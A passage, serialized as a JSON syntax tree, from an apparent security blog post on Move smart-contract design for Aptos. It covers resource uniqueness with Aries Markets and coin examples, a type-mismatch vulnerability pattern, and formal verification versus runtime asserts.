!",{"type":24,"tag":301,"props":13520,"children":13521},{"style":369},[13522],{"type":30,"value":13523},"exists",{"type":24,"tag":301,"props":13525,"children":13526},{"style":359},[13527],{"type":30,"value":1849},{"type":24,"tag":301,"props":13529,"children":13530},{"style":10246},[13531],{"type":30,"value":13532},"CoinInfo",{"type":24,"tag":301,"props":13534,"children":13535},{"style":359},[13536],{"type":30,"value":1849},{"type":24,"tag":301,"props":13538,"children":13539},{"style":10246},[13540],{"type":30,"value":13402},{"type":24,"tag":301,"props":13542,"children":13543},{"style":359},[13544],{"type":30,"value":13545},">>(",{"type":24,"tag":301,"props":13547,"children":13548},{"style":369},[13549],{"type":30,"value":13550},"account_addr",{"type":24,"tag":301,"props":13552,"children":13553},{"style":359},[13554],{"type":30,"value":4656},{"type":24,"tag":301,"props":13556,"children":13557},{"class":303,"line":447},[13558,13563,13567,13572],{"type":24,"tag":301,"props":13559,"children":13560},{"style":359},[13561],{"type":30,"value":13562}," error",{"type":24,"tag":301,"props":13564,"children":13565},{"style":385},[13566],{"type":30,"value":10308},{"type":24,"tag":301,"props":13568,"children":13569},{"style":314},[13570],{"type":30,"value":13571},"already_exists",{"type":24,"tag":301,"props":13573,"children":13574},{"style":359},[13575],{"type":30,"value":13576},"(ECOIN_INFO_ALREADY_PUBLISHED),\n",{"type":24,"tag":301,"props":13578,"children":13579},{"class":303,"line":476},[13580],{"type":24,"tag":301,"props":13581,"children":13582},{"style":359},[13583],{"type":30,"value":13584}," );\n",{"type":24,"tag":32,"props":13586,"children":13587},{},[13588,13590,13595],{"type":30,"value":13589},"While this ",{"type":24,"tag":145,"props":13591,"children":13593},{"className":13592},[],[13594],{"type":30,"value":13532},{"type":30,"value":13596}," isn't returned directly, it still ensures uniqueness of the capability objects.",{"type":24,"tag":32,"props":13598,"children":13599},{},[13600,13602,13609],{"type":30,"value":13601},"Similarly, consider ",{"type":24,"tag":188,"props":13603,"children":13606},{"href":13604,"rel":13605},"https://ariesmarkets.xyz/",[192],[13607],{"type":30,"value":13608},"Aries Markets",{"type":30,"value":13610},", a lending/borrowing protocol building on Aptos.",{"type":24,"tag":32,"props":13612,"children":13613},{},[13614,13616,13622],{"type":30,"value":13615},"Their ",{"type":24,"tag":145,"props":13617,"children":13619},{"className":13618},[],[13620],{"type":30,"value":13621},"ReserveCoinContainer",{"type":30,"value":13623}," struct stores all the relevant data and resources for managing a lending market.",{"type":24,"tag":291,"props":13625,"children":13627},{"className":9818,"code":13626,"language":9817,"meta":7,"style":7}," /// The struct to hold all the underlying `Coin`s.\n /// Stored as a resources.\n struct ReserveCoinContainer\u003Cphantom Coin0> has key {\n /// Stores the available `Coin`.\n underlying_coin: Coin\u003CCoin0>,\n /// Stores the LP `Coin` that act as collateral.\n collateralised_lp_coin: Coin\u003CLP\u003CCoin0>>,\n /// Mint capability for LP Coin.\n mint_capability: MintCapability\u003CLP\u003CCoin0>>,\n /// Burn capability for LP Coin.\n burn_capability: BurnCapability\u003CLP\u003CCoin0>>,\n\n // ...\n }\n\n",[13628],{"type":24,"tag":145,"props":13629,"children":13630},{"__ignoreMap":7},[13631,13639,13647,13688,13696,13725,13733,13770,13778,13815,13823,13860,13867,13874],{"type":24,"tag":301,"props":13632,"children":13633},{"class":303,"line":304},[13634],{"type":24,"tag":301,"props":13635,"children":13636},{"style":1062},[13637],{"type":30,"value":13638}," /// The struct to hold all the underlying `Coin`s.\n",{"type":24,"tag":301,"props":13640,"children":13641},{"class":303,"line":320},[13642],{"type":24,"tag":301,"props":13643,"children":13644},{"style":1062},[13645],{"type":30,"value":13646}," /// Stored as a resources.\n",{"type":24,"tag":301,"props":13648,"children":13649},{"class":303,"line":335},[13650,13654,13659,13663,13667,13672,13676,13680,13684],{"type":24,"tag":301,"props":13651,"children":13652},{"style":348},[13653],{"type":30,"value":12617},{"type":24,"tag":301,"props":13655,"children":13656},{"style":10246},[13657],{"type":30,"value":13658}," ReserveCoinContainer",{"type":24,"tag":301,"props":13660,"children":13661},{"style":359},[13662],{"type":30,"value":1849},{"type":24,"tag":301,"props":13664,"children":13665},{"style":369},[13666],{"type":30,"value":12631},{"type":24,"tag":301,"props":13668,"children":13669},{"style":10246},[13670],{"type":30,"value":13671}," Coin0",{"type":24,"tag":301,"props":13673,"children":13674},{"style":359},[13675],{"type":30,"value":12641},{"type":24,"tag":301,"props":13677,"children":13678},{"style":369},[13679],{"type":30,"value":12646},{"type":24,"tag":301,"props":13681,"children":13682},{"style":369},[13683],{"type":30,"value":12751},{"type":24,"tag":301,"props":13685,"children":13686},{"style":359},[13687],{"type":30,"value":3035},{"type":24,"tag":301,"props":13689,"children":13690},{"class":303,"line":344},[13691],{"type":24,"tag":301,"props":13692,"children":13693},{"style":1062},[13694],{"type":30,"value":13695}," /// Stores the available `Coin`.\n",{"type":24,"tag":301,"props":13697,"children":13698},{"class":303,"line":401},[13699,13704,13708,13712,13716,13721],{"type":24,"tag":301,"props":13700,"children":13701},{"style":369},[13702],{"type":30,"value":13703}," underlying_coin",{"type":24,"tag":301,"props":13705,"children":13706},{"style":385},[13707],{"type":30,"value":1679},{"type":24,"tag":301,"props":13709,"children":13710},{"style":10246},[13711],{"type":30,"value":12622},{"type":24,"tag":301,"props":13713,"children":13714},{"style":359},[13715],{"type":30,"value":1849},{"type":24,"tag":301,"props":13717,"children":13718},{"style":10246},[13719],{"type":30,"value":13720},"Coin0",{"type":24,"tag":301,"props":13722,"children":13723},{"style":359},[13724],{"type":30,"value":12957},{"type":24,"tag":301,"props":13726,"children":13727},{"class":303,"line":415},[13728],{"type":24,"tag":301,"props":13729,"children":13730},{"style":1062},[13731],{"type":30,"value":13732}," /// Stores the LP `Coin` that act as collateral.\n",{"type":24,"tag":301,"props":13734,"children":13735},{"class":303,"line":439},[13736,13741,13745,13749,13753,13757,13761,13765],{"type":24,"tag":301,"props":13737,"children":13738},{"style":369},[13739],{"type":30,"value":13740}," collateralised_lp_coin",{"type":24,"tag":301,"props":13742,"children":13743},{"style":385},[13744],{"type":30,"value":1679},{"type":24,"tag":301,"props":13746,"children":13747},{"style":10246},[13748],{"type":30,"value":12622},{"type":24,"tag":301,"props":13750,"children":13751},{"style":359},[13752],{"type":30,"value":1849},{"type":24,"tag":301,"props":13754,"children":13755},{"style":10246},[13756],{"type":30,"value":13154},{"type":24,"tag":301,"props":13758,"children":13759},{"style":359},[13760],{"type":30,"value":1849},{"type":24,"tag":301,"props":13762,"children":13763},{"style":10246},[13764],{"type":30,"value":13720},{"type":24,"tag":301,"props":13766,"children":13767},{"style":359},[13768],{"type":30,"value":13769},">>,\n",{"type":24,"tag":301,"props":13771,"children":13772},{"class":303,"line":447},[13773],{"type":24,"tag":301,"props":13774,"children":13775},{"style":1062},[13776],{"type":30,"value":13777}," /// Mint capability for LP Coin.\n",{"type":24,"tag":301,"props":13779,"children":13780},{"class":303,"line":476},[13781,13786,13790,13795,13799,13803,13807,13811],{"type":24,"tag":301,"props":13782,"children":13783},{"style":369},[13784],{"type":30,"value":13785}," mint_capability",{"type":24,"tag":301,"props":13787,"children":13788},{"style":385},[13789],{"type":30,"value":1679},{"type":24,"tag":301,"props":13791,"children":13792},{"style":10246},[13793],{"type":30,"value":13794}," MintCapability",{"type":24,"tag":301,"props":13796,"children":13797},{"style":359},[13798],{"type":30,"value":1849},{"type":24,"tag":301,"props":13800,"children":13801},{"style":10246},[13802],{"type":30,"value":13154},{"type":24,"tag":301,"props":13804,"children":13805},{"style":359},[13806],{"type":30,"value":1849},{"type":24,"tag":301,"props":13808,"children":13809},{"style":10246},[13810],{"type":30,"value":13720},{"type":24,"tag":301,"props":13812,"children":13813},{"style":359},[13814],{"type":30,"value":13769},{"type":24,"tag":301,"props":13816,"children":13817},{"class":303,"line":495},[13818],{"type":24,"tag":301,"props":13819,"children":13820},{"style":1062},[13821],{"type":30,"value":13822}," /// Burn capability for LP Coin.\n",{"type":24,"tag":301,"props":13824,"children":13825},{"class":303,"line":504},[13826,13831,13835,13840,13844,13848,13852,13856],{"type":24,"tag":301,"props":13827,"children":13828},{"style":369},[13829],{"type":30,"value":13830}," burn_capability",{"type":24,"tag":301,"props":13832,"children":13833},{"style":385},[13834],{"type":30,"value":1679},{"type":24,"tag":301,"props":13836,"children":13837},{"style":10246},[13838],{"type":30,"value":13839}," BurnCapability",{"type":24,"tag":301,"props":13841,"children":13842},{"style":359},[13843],{"type":30,"value":1849},{"type":24,"tag":301,"props":13845,"children":13846},{"style":10246},[13847],{"type":30,"value":13154},{"type":24,"tag":301,"props":13849,"children":13850},{"style":359},[13851],{"type":30,"value":1849},{"type":24,"tag":301,"props":13853,"children":13854},{"style":10246},[13855],{"type":30,"value":13720},{"type":24,"tag":301,"props":13857,"children":13858},{"style":359},[13859],{"type":30,"value":13769},{"type":24,"tag":301,"props":13861,"children":13862},{"class":303,"line":512},[13863],{"type":24,"tag":301,"props":13864,"children":13865},{"emptyLinePlaceholder":16},[13866],{"type":30,"value":341},{"type":24,"tag":301,"props":13868,"children":13869},{"class":303,"line":592},[13870],{"type":24,"tag":301,"props":13871,"children":13872},{"style":1062},[13873],{"type":30,"value":13415},{"type":24,"tag":301,"props":13875,"children":13876},{"class":303,"line":619},[13877],{"type":24,"tag":301,"props":13878,"children":13879},{"style":359},[13880],{"type":30,"value":6918},{"type":24,"tag":32,"props":13882,"children":13883},{},[13884,13886,13891],{"type":30,"value":13885},"When creating a ",{"type":24,"tag":145,"props":13887,"children":13889},{"className":13888},[],[13890],{"type":30,"value":13621},{"type":30,"value":13892},", uniqueness is implicitly enforced by moving it into a hardcoded address.",{"type":24,"tag":291,"props":13894,"children":13896},{"className":9818,"code":13895,"language":9817,"meta":7,"style":7}," public(friend) fun create\u003CCoin0>(\n lp_store: &signer,\n // ...\n ) acquires Reserves {\n lp::assert_is_lp_store(signer::address_of(lp_store));\n\n // ...\n\n move_to(lp_store, ReserveCoinContainer\u003CCoin0> {\n // ...\n });\n",[13897],{"type":24,"tag":145,"props":13898,"children":13899},{"__ignoreMap":7},[13900,13943,13968,13975,13996,14040,14047,14054,14061,14098,14105],{"type":24,"tag":301,"props":13901,"children":13902},{"class":303,"line":304},[13903,13908,13912,13917,13921,13926,13931,13935,13939],{"type":24,"tag":301,"props":13904,"children":13905},{"style":314},[13906],{"type":30,"value":13907}," public",{"type":24,"tag":301,"props":13909,"children":13910},{"style":359},[13911],{"type":30,"value":362},{"type":24,"tag":301,"props":13913,"children":13914},{"style":369},[13915],{"type":30,"value":13916},"friend",{"type":24,"tag":301,"props":13918,"children":13919},{"style":359},[13920],{"type":30,"value":911},{"type":24,"tag":301,"props":13922,"children":13923},{"style":369},[13924],{"type":30,"value":13925},"fun",{"type":24,"tag":301,"props":13927,"children":13928},{"style":369},[13929],{"type":30,"value":13930}," create",{"type":24,"tag":301,"props":13932,"children":13933},{"style":359},[13934],{"type":30,"value":1849},{"type":24,"tag":301,"props":13936,"children":13937},{"style":10246},[13938],{"type":30,"value":13720},{"type":24,"tag":301,"props":13940,"children":13941},{"style":359},[13942],{"type":30,"value":13407},{"type":24,"tag":301,"props":13944,"children":13945},{"class":303,"line":320},[13946,13951,13955,13959,13964],{"type":24,"tag":301,"props":13947,"children":13948},{"style":369},[13949],{"type":30,"value":13950}," lp_store",{"type":24,"tag":301,"props":13952,"children":13953},{"style":385},[13954],{"type":30,"value":1679},{"type":24,"tag":301,"props":13956,"children":13957},{"style":385},[13958],{"type":30,"value":991},{"type":24,"tag":301,"props":13960,"children":13961},{"style":369},[13962],{"type":30,"value":13963},"signer",{"type":24,"tag":301,"props":13965,"children":13966},{"style":359},[13967],{"type":30,"value":1729},{"type":24,"tag":301,"props":13969,"children":13970},{"class":303,"line":335},[13971],{"type":24,"tag":301,"props":13972,"children":13973},{"style":1062},[13974],{"type":30,"value":13415},{"type":24,"tag":301,"props":13976,"children":13977},{"class":303,"line":344},[13978,13983,13987,13992],{"type":24,"tag":301,"props":13979,"children":13980},{"style":359},[13981],{"type":30,"value":13982}," ) ",{"type":24,"tag":301,"props":13984,"children":13985},{"style":369},[13986],{"type":30,"value":13163},{"type":24,"tag":301,"props":13988,"children":13989},{"style":10246},[13990],{"type":30,"value":13991}," Reserves",{"type":24,"tag":301,"props":13993,"children":13994},{"style":359},[13995],{"type":30,"value":3035},{"type":24,"tag":301,"props":13997,"children":13998},{"class":303,"line":401},[13999,14004,14008,14013,14018,14022,14027,14031,14036],{"type":24,"tag":301,"props":14000,"children":14001},{"style":359},[14002],{"type":30,"value":14003}," lp",{"type":24,"tag":301,"props":14005,"children":14006},{"style":385},[14007],{"type":30,"value":10308},{"type":24,"tag":301,"props":14009,"children":14010},{"style":314},[14011],{"type":30,"value":14012},"assert_is_lp_store",{"type":24,"tag":301,"props":14014,"children":14015},{"style":359},[14016],{"type":30,"value":14017},"(signer",{"type":24,"tag":301,"props":14019,"children":14020},{"style":385},[14021],{"type":30,"value":10308},{"type":24,"tag":301,"props":14023,"children":14024},{"style":314},[14025],{"type":30,"value":14026},"address_of",{"type":24,"tag":301,"props":14028,"children":14029},{"style":359},[14030],{"type":30,"value":362},{"type":24,"tag":301,"props":14032,"children":14033},{"style":369},[14034],{"type":30,"value":14035},"lp_store",{"type":24,"tag":301,"props":14037,"children":14038},{"style":359},[14039],{"type":30,"value":3416},{"type":24,"tag":301,"props":14041,"children":14042},{"class":303,"line":415},[14043],{"type":24,"tag":301,"props":14044,"children":14045},{"emptyLinePlaceholder":16},[14046],{"type":30,"value":341},{"type":24,"tag":301,"props":14048,"children":14049},{"class":303,"line":439},[14050],{"type":24,"tag":301,"props":14051,"children":14052},{"style":1062},[14053],{"type":30,"value":13415},{"type":24,"tag":301,"props":14055,"children":14056},{"class":303,"line":447},[14057],{"type":24,"tag":301,"props":14058,"children":14059},{"emptyLinePlaceholder":16},[14060],{"type":30,"value":341},{"type":24,"tag":301,"props":14062,"children":14063},{"class":303,"line":476},[14064,14069,14073,14077,14081,14085,14089,14093],{"type":24,"tag":301,"props":14065,"children":14066},{"style":314},[14067],{"type":30,"value":14068}," move_to",{"type":24,"tag":301,"props":14070,"children":14071},{"style":359},[14072],{"type":30,"value":362},{"type":24,"tag":301,"props":14074,"children":14075},{"style":369},[14076],{"type":30,"value":14035},{"type":24,"tag":301,"props":14078,"children":14079},{"style":359},[14080],{"type":30,"value":377},{"type":24,"tag":301,"props":14082,"children":14083},{"style":10246},[14084],{"type":30,"value":13621},{"type":24,"tag":301,"props":14086,"children":14087},{"style":359},[14088],{"type":30,"value":1849},{"type":24,"tag":301,"props":14090,"children":14091},{"style":10246},[14092],{"type":30,"value":13720},{"type":24,"tag":301,"props":14094,"children":14095},{"style":359},[14096],{"type":30,"value":14097},"> {\n",{"type":24,"tag":301,"props":14099,"children":14100},{"class":303,"line":495},[14101],{"type":24,"tag":301,"props":14102,"children":14103},{"style":1062},[14104],{"type":30,"value":12994},{"type":24,"tag":301,"props":14106,"children":14107},{"class":303,"line":504},[14108],{"type":24,"tag":301,"props":14109,"children":14110},{"style":359},[14111],{"type":30,"value":14112}," });\n",{"type":24,"tag":32,"props":14114,"children":14115},{},[14116],{"type":30,"value":14117},"In both these instances, type association only works because we create exactly one instance per type.",{"type":24,"tag":32,"props":14119,"children":14120},{},[14121,14123,14129,14131,14137,14139,14144],{"type":30,"value":14122},"On the other hand, consider if you have a ",{"type":24,"tag":145,"props":14124,"children":14126},{"className":14125},[],[14127],{"type":30,"value":14128},"Position\u003CT>",{"type":30,"value":14130}," and a ",{"type":24,"tag":145,"props":14132,"children":14134},{"className":14133},[],[14135],{"type":30,"value":14136},"Market\u003CT>",{"type":30,"value":14138}," where ",{"type":24,"tag":145,"props":14140,"children":14142},{"className":14141},[],[14143],{"type":30,"value":12807},{"type":30,"value":14145}," is the coin type.",{"type":24,"tag":291,"props":14147,"children":14149},{"className":9818,"code":14148,"language":9817,"meta":7,"style":7}," struct Market\u003Cphantom T> {\n reserves: Coin\u003CT>,\n // ...\n }\n\n struct Position\u003Cphantom T> {\n amount: u64,\n // ...\n }\n",[14150],{"type":24,"tag":145,"props":14151,"children":14152},{"__ignoreMap":7},[14153,14181,14209,14216,14223,14230,14258,14278,14285],{"type":24,"tag":301,"props":14154,"children":14155},{"class":303,"line":304},[14156,14160,14165,14169,14173,14177],{"type":24,"tag":301,"props":14157,"children":14158},{"style":348},[14159],{"type":30,"value":5735},{"type":24,"tag":301,"props":14161,"children":14162},{"style":10246},[14163],{"type":30,"value":14164}," Market",{"type":24,"tag":301,"props":14166,"children":14167},{"style":359},[14168],{"type":30,"value":1849},{"type":24,"tag":301,"props":14170,"children":14171},{"style":369},[14172],{"type":30,"value":12631},{"type":24,"tag":301,"props":14174,"children":14175},{"style":10246},[14176],{"type":30,"value":12738},{"type":24,"tag":301,"props":14178,"children":14179},{"style":359},[14180],{"type":30,"value":14097},{"type":24,"tag":301,"props":14182,"children":14183},{"class":303,"line":320},[14184,14189,14193,14197,14201,14205],{"type":24,"tag":301,"props":14185,"children":14186},{"style":369},[14187],{"type":30,"value":14188}," reserves",{"type":24,"tag":301,"props":14190,"children":14191},{"style":385},[14192],{"type":30,"value":1679},{"type":24,"tag":301,"props":14194,"children":14195},{"style":10246},[14196],{"type":30,"value":12622},{"type":24,"tag":301,"props":14198,"children":14199},{"style":359},[14200],{"type":30,"value":1849},{"type":24,"tag":301,"props":14202,"children":14203},{"style":10246},[14204],{"type":30,"value":12807},{"type":24,"tag":301,"props":14206,"children":14207},{"style":359},[14208],{"type":30,"value":12957},{"type":24,"tag":301,"props":14210,"children":14211},{"class":303,"line":335},[14212],{"type":24,"tag":301,"props":14213,"children":14214},{"style":1062},[14215],{"type":30,"value":12994},{"type":24,"tag":301,"props":14217,"children":14218},{"class":303,"line":344},[14219],{"type":24,"tag":301,"props":14220,"children":14221},{"style":359},[14222],{"type":30,"value":501},{"type":24,"tag":301,"props":14224,"children":14225},{"class":303,"line":401},[14226],{"type":24,"tag":301,"props":14227,"children":14228},{"emptyLinePlaceholder":16},[14229],{"type":30,"value":341},{"type":24,"tag":301,"props":14231,"children":14232},{"class":303,"line":415},[14233,14237,14242,14246,14250,14254],{"type":24,"tag":301,"props":14234,"children":14235},{"style":348},[14236],{"type":30,"value":5735},{"type":24,"tag":301,"props":14238,"children":14239},{"style":10246},[14240],{"type":30,"value":14241}," Position",{"type":24,"tag":301,"props":14243,"children":14244},{"style":359},[14245],{"type":30,"value":1849},{"type":24,"tag":301,"props":14247,"children":14248},{"style":369},[14249],{"type":30,"value":12631},{"type":24,"tag":301,"props":14251,"children":14252},{"style":10246},[14253],{"type":30,"value":12738},{"type":24,"tag":301,"props":14255,"children":14256},{"style":359},[14257],{"type":30,"value":14097},{"type":24,"tag":301,"props":14259,"children":14260},{"class":303,"line":439},[14261,14266,14270,14274],{"type":24,"tag":301,"props":14262,"children":14263},{"style":369},[14264],{"type":30,"value":14265}," amount",{"type":24,"tag":301,"props":14267,"children":14268},{"style":385},[14269],{"type":30,"value":1679},{"type":24,"tag":301,"props":14271,"children":14272},{"style":10246},[14273],{"type":30,"value":12680},{"type":24,"tag":301,"props":14275,"children":14276},{"style":359},[14277],{"type":30,"value":1729},{"type":24,"tag":301,"props":14279,"children":14280},{"class":303,"line":447},[14281],{"type":24,"tag":301,"props":14282,"children":14283},{"style":1062},[14284],{"type":30,"value":12994},{"type":24,"tag":301,"props":14286,"children":14287},{"class":303,"line":476},[14288],{"type":24,"tag":301,"props":14289,"children":14290},{"style":359},[14291],{"type":30,"value":501},{"type":24,"tag":32,"props":14293,"children":14294},{},[14295,14296,14301,14303,14308],{"type":30,"value":8842},{"type":24,"tag":145,"props":14297,"children":14299},{"className":14298},[],[14300],{"type":30,"value":14136},{"type":30,"value":14302}," isn't a unique type -- or in other words if you're able to create more than one instance of a market per type ",{"type":24,"tag":145,"props":14304,"children":14306},{"className":14305},[],[14307],{"type":30,"value":12807},{"type":30,"value":14309}," -- you might be able to pass in the incorrect market for a given position. This is a common vulnerability pattern on Solana.",{"type":24,"tag":32,"props":14311,"children":14312},{},[14313],{"type":30,"value":14314},"Dynamic iteration of types is also impossible (at least as currently designed by the Move VM) leading to massive headaches for developers. In these scenarios, we empirically observe developers defaulting back to type reflection APIs, complicating code unnecessarily. Security at the expense of usability comes at the expense of security.",{"type":24,"tag":291,"props":14316,"children":14318},{"className":9818,"code":14317,"language":9817,"meta":7,"style":7}," /// Get the price of the token per lamport.\n public fun get_price(type_info: TypeInfo): Decimal acquires Oracle {\n let oracle = borrow_global_mut\u003COracle>(@oracle);\n let price = table::borrow_mut_with_default\u003CTypeInfo, Decimal>(\n &mut oracle.prices,\n type_info,\n decimal::one()\n );\n *price\n }\n",[14319],{"type":24,"tag":145,"props":14320,"children":14321},{"__ignoreMap":7},[14322,14330,14392,14441,14493,14518,14530,14552,14560,14573],{"type":24,"tag":301,"props":14323,"children":14324},{"class":303,"line":304},[14325],{"type":24,"tag":301,"props":14326,"children":14327},{"style":1062},[14328],{"type":30,"value":14329}," /// Get the price of the token per lamport.\n",{"type":24,"tag":301,"props":14331,"children":14332},{"class":303,"line":320},[14333,14338,14342,14347,14351,14356,14360,14365,14369,14373,14378,14383,14388],{"type":24,"tag":301,"props":14334,"children":14335},{"style":369},[14336],{"type":30,"value":14337}," public",{"type":24,"tag":301,"props":14339,"children":14340},{"style":369},[14341],{"type":30,"value":13026},{"type":24,"tag":301,"props":14343,"children":14344},{"style":314},[14345],{"type":30,"value":14346}," get_price",{"type":24,"tag":301,"props":14348,"children":14349},{"style":359},[14350],{"type":30,"value":362},{"type":24,"tag":301,"props":14352,"children":14353},{"style":369},[14354],{"type":30,"value":14355},"type_info",{"type":24,"tag":301,"props":14357,"children":14358},{"style":385},[14359],{"type":30,"value":1679},{"type":24,"tag":301,"props":14361,"children":14362},{"style":10246},[14363],{"type":30,"value":14364}," TypeInfo",{"type":24,"tag":301,"props":14366,"children":14367},{"style":359},[14368],{"type":30,"value":9961},{"type":24,"tag":301,"props":14370,"children":14371},{"style":385},[14372],{"type":30,"value":1679},{"type":24,"tag":301,"props":14374,"children":14375},{"style":10246},[14376],{"type":30,"value":14377}," Decimal",{"type":24,"tag":301,"props":14379,"children":14380},{"style":369},[14381],{"type":30,"value":14382}," acquires",{"type":24,"tag":301,"props":14384,"children":14385},{"style":10246},[14386],{"type":30,"value":14387}," Oracle",{"type":24,"tag":301,"props":14389,"children":14390},{"style":359},[14391],{"type":30,"value":3035},{"type":24,"tag":301,"props":14393,"children":14394},{"class":303,"line":335},[14395,14399,14404,14408,14413,14417,14422,14427,14432,14437],{"type":24,"tag":301,"props":14396,"children":14397},{"style":348},[14398],{"type":30,"value":9900},{"type":24,"tag":301,"props":14400,"children":14401},{"style":369},[14402],{"type":30,"value":14403}," oracle",{"type":24,"tag":301,"props":14405,"children":14406},{"style":385},[14407],{"type":30,"value":2537},{"type":24,"tag":301,"props":14409,"children":14410},{"style":369},[14411],{"type":30,"value":14412}," borrow_global_mut",{"type":24,"tag":301,"props":14414,"children":14415},{"style":359},[14416],{"type":30,"value":1849},{"type":24,"tag":301,"props":14418,"children":14419},{"style":10246},[14420],{"type":30,"value":14421},"Oracle",{"type":24,"tag":301,"props":14423,"children":14424},{"style":359},[14425],{"type":30,"value":14426},">(",{"type":24,"tag":301,"props":14428,"children":14429},{"style":385},[14430],{"type":30,"value":14431},"@",{"type":24,"tag":301,"props":14433,"children":14434},{"style":369},[14435],{"type":30,"value":14436},"oracle",{"type":24,"tag":301,"props":14438,"children":14439},{"style":359},[14440],{"type":30,"value":589},{"type":24,"tag":301,"props":14442,"children":14443},{"class":303,"line":344},[14444,14448,14453,14457,14462,14466,14471,14475,14480,14484,14489],{"type":24,"tag":301,"props":14445,"children":14446},{"style":348},[14447],{"type":30,"value":9900},{"type":24,"tag":301,"props":14449,"children":14450},{"style":369},[14451],{"type":30,"value":14452}," price",{"type":24,"tag":301,"props":14454,"children":14455},{"style":385},[14456],{"type":30,"value":2537},{"type":24,"tag":301,"props":14458,"children":14459},{"style":359},[14460],{"type":30,"value":14461}," table",{"type":24,"tag":301,"props":14463,"children":14464},{"style":385},[14465],{"type":30,"value":10308},{"type":24,"tag":301,"props":14467,"children":14468},{"style":369},[14469],{"type":30,"value":14470},"borrow_mut_with_default",{"type":24,"tag":301,"props":14472,"children":14473},{"style":359},[14474],{"type":30,"value":1849},{"type":24,"tag":301,"props":14476,"children":14477},{"style":10246},[14478],{"type":30,"value":14479},"TypeInfo",{"type":24,"tag":301,"props":14481,"children":14482},{"style":359},[14483],{"type":30,"value":377},{"type":24,"tag":301,"props":14485,"children":14486},{"style":10246},[14487],{"type":30,"value":14488},"Decimal",{"type":24,"tag":301,"props":14490,"children":14491},{"style":359},[14492],{"type":30,"value":13407},{"type":24,"tag":301,"props":14494,"children":14495},{"class":303,"line":401},[14496,14501,14505,14509,14513],{"type":24,"tag":301,"props":14497,"children":14498},{"style":385},[14499],{"type":30,"value":14500}," &",{"type":24,"tag":301,"props":14502,"children":14503},{"style":348},[14504],{"type":30,"value":10550},{"type":24,"tag":301,"props":14506,"children":14507},{"style":369},[14508],{"type":30,"value":14403},{"type":24,"tag":301,"props":14510,"children":14511},{"style":385},[14512],{"type":30,"value":206},{"type":24,"tag":301,"props":14514,"children":14515},{"style":359},[14516],{"type":30,"value":14517},"prices,\n",{"type":24,"tag":301,"props":14519,"children":14520},{"class":303,"line":415},[14521,14526],{"type":24,"tag":301,"props":14522,"children":14523},{"style":369},[14524],{"type":30,"value":14525}," type_info",{"type":24,"tag":301,"props":14527,"children":14528},{"style":359},[14529],{"type":30,"value":1729},{"type":24,"tag":301,"props":14531,"children":14532},{"class":303,"line":439},[14533,14538,14542,14547],{"type":24,"tag":301,"props":14534,"children":14535},{"style":359},[14536],{"type":30,"value":14537}," decimal",{"type":24,"tag":301,"props":14539,"children":14540},{"style":385},[14541],{"type":30,"value":10308},{"type":24,"tag":301,"props":14543,"children":14544},{"style":314},[14545],{"type":30,"value":14546},"one",{"type":24,"tag":301,"props":14548,"children":14549},{"style":359},[14550],{"type":30,"value":14551},"()\n",{"type":24,"tag":301,"props":14553,"children":14554},{"class":303,"line":447},[14555],{"type":24,"tag":301,"props":14556,"children":14557},{"style":359},[14558],{"type":30,"value":14559}," );\n",{"type":24,"tag":301,"props":14561,"children":14562},{"class":303,"line":476},[14563,14568],{"type":24,"tag":301,"props":14564,"children":14565},{"style":385},[14566],{"type":30,"value":14567}," *",{"type":24,"tag":301,"props":14569,"children":14570},{"style":369},[14571],{"type":30,"value":14572},"price\n",{"type":24,"tag":301,"props":14574,"children":14575},{"class":303,"line":495},[14576],{"type":24,"tag":301,"props":14577,"children":14578},{"style":359},[14579],{"type":30,"value":501},{"type":24,"tag":32,"props":14581,"children":14582},{},[14583,14585,14590],{"type":30,"value":14584},"Type association feels like a proxy for the intended pattern -- associating resources with instances. It's very useful being able to store a reference to an ",{"type":24,"tag":5422,"props":14586,"children":14587},{},[14588],{"type":30,"value":14589},"instance",{"type":30,"value":14591}," of another resource (which is possible in Diem style move).",{"type":24,"tag":32,"props":14593,"children":14594},{},[14595],{"type":30,"value":14596},"In summary, when using type systems to bind resources to each other, it's important to either",{"type":24,"tag":6246,"props":14598,"children":14599},{},[14600,14605],{"type":24,"tag":2659,"props":14601,"children":14602},{},[14603],{"type":30,"value":14604},"Have unique initializers for your resources",{"type":24,"tag":2659,"props":14606,"children":14607},{},[14608],{"type":30,"value":14609},"Associate resources with instances directly",{"type":24,"tag":43,"props":14611,"children":14613},{"id":14612},"formal-verification",[14614],{"type":30,"value":14615},"Formal Verification",{"type":24,"tag":32,"props":14617,"children":14618},{},[14619],{"type":30,"value":14620},"Formal verification is another exciting feature.",{"type":24,"tag":32,"props":14622,"children":14623},{},[14624],{"type":30,"value":14625},"As part of our work with protocols, we actively use formal verification to prove aspects of security.",{"type":24,"tag":32,"props":14627,"children":14628},{},[14629,14631,14636],{"type":30,"value":14630},"However, this isn't a silver bullet. The key is figuring out ",{"type":24,"tag":5422,"props":14632,"children":14633},{},[14634],{"type":30,"value":14635},"what",{"type":30,"value":14637}," to prove.",{"type":24,"tag":32,"props":14639,"children":14640},{},[14641,14643,14650],{"type":30,"value":14642},"One obvious idea might be a properties across a particular function. For example, we might want to ensure that a swap doesn't reduce the value of the pool -- similar to the ",{"type":24,"tag":188,"props":14644,"children":14647},{"href":14645,"rel":14646},"https://osec.io/blog/reports/2022-04-26-spl-swap-rounding/",[192],[14648],{"type":30,"value":14649},"Solana AMM rounding issue",{"type":30,"value":14651}," we reported.",{"type":24,"tag":32,"props":14653,"children":14654},{},[14655],{"type":30,"value":14656},"However, this could also be checked with a simple runtime assert. For example, we recommended Pontem assert that liquidity pool token values are strictly increasing.",{"type":24,"tag":291,"props":14658,"children":14660},{"className":9818,"code":14659,"language":9817,"meta":7,"style":7}," let cmp = u256::compare(&lp_value_after_swap_and_fee, &lp_value_before_swap_u256);\n assert!(cmp == 2, ERR_INCORRECT_SWAP);\n",[14661],{"type":24,"tag":145,"props":14662,"children":14663},{"__ignoreMap":7},[14664,14725],{"type":24,"tag":301,"props":14665,"children":14666},{"class":303,"line":304},[14667,14672,14677,14681,14686,14690,14695,14699,14703,14708,14712,14716,14721],{"type":24,"tag":301,"props":14668,"children":14669},{"style":348},[14670],{"type":30,"value":14671}," let",{"type":24,"tag":301,"props":14673,"children":14674},{"style":369},[14675],{"type":30,"value":14676}," cmp",{"type":24,"tag":301,"props":14678,"children":14679},{"style":385},[14680],{"type":30,"value":2537},{"type":24,"tag":301,"props":14682,"children":14683},{"style":359},[14684],{"type":30,"value":14685}," 